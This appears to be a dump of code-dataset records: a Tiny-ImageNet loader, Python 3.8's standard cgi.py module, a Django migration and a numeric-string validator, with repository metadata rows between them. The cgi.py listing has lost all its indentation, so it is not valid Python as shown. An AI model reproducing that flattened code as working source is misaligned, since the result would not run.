        # The boxes file lists the image filenames for this class.
        boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
        with open(boxes_file, 'r') as f:
            filenames = [x.split('\t')[0] for x in f]
        num_images = len(filenames)

        X_train_block = np.zeros((num_images, 3, 64, 64), dtype=dtype)
        y_train_block = wnid_to_label[wnid] * \
            np.ones(num_images, dtype=np.int64)
        for j, img_file in enumerate(filenames):
            img_file = os.path.join(path, 'train', wnid, 'images', img_file)
            img = _imread(img_file)
            if img.ndim == 2:
                # Grayscale file: add a singleton channel axis.
                img.shape = (64, 64, 1)
            X_train_block[j] = img.transpose(2, 0, 1)
        X_train.append(X_train_block)
        y_train.append(y_train_block)

    # We need to concatenate all training data.
    X_train = np.concatenate(X_train, axis=0)
    y_train = np.concatenate(y_train, axis=0)

    # Next load validation data; labels come from val_annotations.txt.
    with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
        img_files = []
        val_wnids = []
        for line in f:
            img_file, wnid = line.split('\t')[:2]
            img_files.append(img_file)
            val_wnids.append(wnid)
    num_val = len(img_files)
    y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
    X_val = np.zeros((num_val, 3, 64, 64), dtype=dtype)
    for i, img_file in enumerate(img_files):
        img_file = os.path.join(path, 'val', 'images', img_file)
        img = _imread(img_file)
        if img.ndim == 2:
            img.shape = (64, 64, 1)
        X_val[i] = img.transpose(2, 0, 1)

    # Next load test images.
    # Students won't have test labels, so we need to iterate over files in the
    # images directory.
    img_files = os.listdir(os.path.join(path, 'test', 'images'))
    X_test = np.zeros((len(img_files), 3, 64, 64), dtype=dtype)
    for i, img_file in enumerate(img_files):
        img_file = os.path.join(path, 'test', 'images', img_file)
        img = _imread(img_file)
        if img.ndim == 2:
            img.shape = (64, 64, 1)
        X_test[i] = img.transpose(2, 0, 1)

    # Test labels are only present in instructor copies.
    y_test = None
    y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
    if os.path.isfile(y_test_file):
        with open(y_test_file, 'r') as f:
            img_file_to_wnid = {}
            for line in f:
                line = line.split('\t')
                img_file_to_wnid[line[0]] = line[1]
        y_test = [wnid_to_label[img_file_to_wnid[img_file]]
                  for img_file in img_files]
        y_test = np.array(y_test)

    mean_image = X_train.mean(axis=0)
    if subtract_mean:
        X_train -= mean_image[None]
        X_val -= mean_image[None]
        X_test -= mean_image[None]

    # NOTE: the original dict repeated the 'class_names' key; the duplicate
    # has been removed (the value was identical, so behaviour is unchanged).
    return {
        'class_names': class_names,
        'X_train': X_train,
        'y_train': y_train,
        'X_val': X_val,
        'y_val': y_val,
        'X_test': X_test,
        'y_test': y_test,
        'mean_image': mean_image,
    }
def load_models(models_dir):
    """Unpickle every loadable model file found in *models_dir*.

    Files that fail to unpickle (such as README.txt) are silently
    skipped.  Returns a dict mapping file name -> model object (the
    'model' field of each pickled dictionary).
    """
    models = {}
    for fname in os.listdir(models_dir):
        full_path = os.path.join(models_dir, fname)
        with open(full_path, 'rb') as f:
            try:
                models[fname] = load_pickle(f)['model']
            except pickle.UnpicklingError:
                # Not a pickle -- skip this file.
                continue
    return models
def load_imagenet_val(num=None):
    """Load a handful of validation images from ImageNet.

    Inputs:
    - num: Number of images to load (max of 25)

    Returns:
    - X: numpy array with shape [num, 224, 224, 3]
    - y: numpy array of integer image labels, shape [num]
    - class_names: dict mapping integer label to class name
    """
    imagenet_fn = './data/imagenet_val_25.npz'
    if not os.path.isfile(imagenet_fn):
        print('file %s not found' % imagenet_fn)
        # Kept as an assert for backward compatibility (callers may expect
        # AssertionError), although it would vanish under `python -O`.
        assert False, 'Need to download imagenet_val_25.npz'
    # BUGFIX: numpy >= 1.16.3 defaults np.load to allow_pickle=False, which
    # breaks reading the pickled label_map object array inside the archive.
    f = np.load(imagenet_fn, allow_pickle=True)
    X = f['X']
    y = f['y']
    # label_map is stored as a 0-d object array; .item() unwraps the dict.
    class_names = f['label_map'].item()
    if num is not None:
        X = X[:num]
        y = y[:num]
    return X, y, class_names
| [
"tlgjerberg@protonmail.com"
] | tlgjerberg@protonmail.com |
f9c2f40f505b378f8301758253f7362e714120e9 | 4ff5ca8f95e6014fa76323a69f3fbcb91ae8db1f | /usr/lib/python3.8/cgi.py | e41e56e0987fdb28510766b99564fb42e1ee50f8 | [
"Python-2.0"
] | permissive | Nasera5222/git-sdk-32 | ad1ccd631958d1cdbc6f6c9d06793342d5c566ce | bcff70f916ec1f028f79036d5b913a7279fea0e5 | refs/heads/main | 2023-06-01T09:05:05.990441 | 2021-06-20T03:07:00 | 2021-06-20T03:07:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,548 | py | #!/usr/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
from collections.abc import Mapping
import sys
import os
import urllib.parse
from email.parser import FeedParser
from email.message import Message
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage", "parse", "parse_multipart",
"parse_header", "test", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global log, logfile, logfp
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except OSError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
def closelog():
"""Close the log file."""
global log, logfile, logfp
logfile = ''
if logfp:
logfp.close()
logfp = None
log = initlog
log = initlog # The current logging function
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
if not 'REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
def parse_multipart(fp, pdict, encoding="utf-8", errors="replace"):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
encoding, errors: request encoding and error handler, passed to
FieldStorage
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. For non-file fields, the value
is a list of strings.
"""
# RFC 2026, Section 5.1 : The "multipart" boundary delimiters are always
# represented as 7bit US-ASCII.
boundary = pdict['boundary'].decode('ascii')
ctype = "multipart/form-data; boundary={}".format(boundary)
headers = Message()
headers.set_type(ctype)
headers['Content-Length'] = pdict['CONTENT-LENGTH']
fs = FieldStorage(fp, headers=headers, encoding=encoding, errors=errors,
environ={'REQUEST_METHOD': 'POST'})
return {k: fs.getlist(k) for k in fs}
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
The items are either a Python list (if there's multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
bytes* ; None if the data is stored a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace',
max_num_fields=None):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
max_num_fields: int. If set, then __init__ throws a ValueError
if there are more than n fields read by parse_qsl().
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
self.max_num_fields = max_num_fields
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
else:
if not (isinstance(headers, (Mapping, Message))):
raise TypeError("headers must be mapping or an instance of "
"email.message.Message")
self.headers = headers
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
if not (hasattr(fp, 'read') and hasattr(fp, 'readline')):
raise TypeError("fp must be file pointer")
self.fp = fp
self.encoding = encoding
self.errors = errors
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
self.innerboundary = pdict['boundary'].encode(self.encoding,
self.errors)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen >= 0:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __del__(self):
try:
self.file.close()
except AttributeError:
pass
def __enter__(self):
return self
def __exit__(self, *args):
self.file.close()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
def __bool__(self):
if self.list is None:
raise TypeError("Cannot be converted to bool.")
return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
qs += '&' + self.qs_on_post
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list = [MiniFieldStorage(key, value) for key, value in query]
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list.extend(MiniFieldStorage(key, value) for key, value in query)
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
# Ensure that we consume the file until we've hit our inner boundary
while (first_line.strip() != (b"--" + self.innerboundary) and
first_line):
first_line = self.fp.readline()
self.bytes_read += len(first_line)
# Propagate max_num_fields into the sub class appropriately
max_num_fields = self.max_num_fields
if max_num_fields is not None:
max_num_fields -= len(self.list)
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
# parser takes strings, not bytes
self.bytes_read += len(hdr_text)
parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
# Some clients add Content-Length for part headers, ignore them
if 'content-length' in headers:
del headers['content-length']
limit = None if self.limit is None \
else self.limit - self.bytes_read
part = klass(self.fp, headers, ib, environ, keep_blank_values,
strict_parsing, limit,
self.encoding, self.errors, max_num_fields)
if max_num_fields is not None:
max_num_fields -= 1
if part.list:
max_num_fields -= len(part.list)
if max_num_fields < 0:
raise ValueError('Max number of fields exceeded')
self.bytes_read += part.bytes_read
self.list.append(part)
if part.done or self.bytes_read >= self.length > 0:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
while 1:
if self.limit is not None and _read >= self.limit:
break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if delim == b"\r":
line = delim + line
delim = b""
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
elif line.endswith(b"\r"):
# We may interrupt \r\n sequences if they span the 2**16
# byte boundary
delim = b"\r"
line = line[:-1]
last_line_lfend = False
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
encoding=self.encoding, newline = '\n')
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except OSError as msg:
print("OSError:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def valid_boundary(s):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| [
"ci@git-for-windows.build"
] | ci@git-for-windows.build |
39f3d8f7e328e35f453d4f1c22d7fc1ca12b1f66 | 87df492e911f955ab39ad462c1f0bc7e71fed308 | /blog/migrations/0001_initial.py | bb0e41dd267a5a600550916a47129e99d51496e6 | [] | no_license | Rustamnurg/SuperAPI | 4efc3d7fbf3aed559210b3a9bc2d5598ffad9a99 | ced3fb8c87aedfe883913c25697c1b1d15c7b1ea | refs/heads/master | 2018-09-20T05:30:25.289318 | 2018-06-06T11:49:42 | 2018-06-06T11:49:42 | 126,050,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-03-15 08:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('device_id', models.BigIntegerField()),
('windows_id', models.BigIntegerField()),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"nurgaliev_rustam@namisoft.ru"
] | nurgaliev_rustam@namisoft.ru |
cf0aa22764dcdc0f335fb637f43812e18d622998 | c36edf21f868315e1a1f63cf8a88398c926b3a8b | /CodingInterviewChinese2-master_python/CodingInterviewChinese2-master/20_表示数值的字符串.py | 158447f441d2101851ac2c0b48c9efbe2f5bb14e | [] | no_license | kcmao/leetcode_exercise | 85037de7b148b7dc162c52c672510d260dfe3574 | e52e0e18b7cef923a5f0eb000968f4234199978f | refs/heads/master | 2020-04-11T01:57:50.254666 | 2019-08-04T13:02:28 | 2019-08-04T13:02:28 | 161,431,354 | 1 | 0 | null | 2019-05-27T14:35:49 | 2018-12-12T04:10:37 | Python | UTF-8 | Python | false | false | 1,098 | py | def is_numeric(string):
if not isinstance(string, str):
return False
index = 0
result, index = scan_integer(string, index)
if index < len(string) and string[index] == '.':
index += 1
has_float, index = scan_unsigned_integer(string, index)
result = result or has_float
if index < len(string) and string[index] in ('e', 'E'):
index += 1
has_exp, index = scan_integer(string, index)
result = result and has_exp
return result and index == len(string)
def scan_integer(string, index):
if index < len(string) and string[index] in ('-', '+'):
index += 1
return scan_unsigned_integer(string, index)
def scan_unsigned_integer(string, index):
old_index = index
while index < len(string) and string[index] in '0123456789':
index += 1
return (old_index != index), index
if __name__ == "__main__":
print(is_numeric("+100"))
print(is_numeric("5e2"))
print(is_numeric("-200"))
print(is_numeric("3.1415926"))
print(is_numeric("1.34e-2"))
print(is_numeric("1.34e"))
| [
"kc_mao@qq.com"
] | kc_mao@qq.com |
fac5e95d958639663214802e1a8b74418042fad4 | e744200bde3201e14b84b851c2dacf3627f66747 | /lambda_function.py | 476bd0bde6bb6e2fc7f4b8ac60a19e52d8c29481 | [
"MIT"
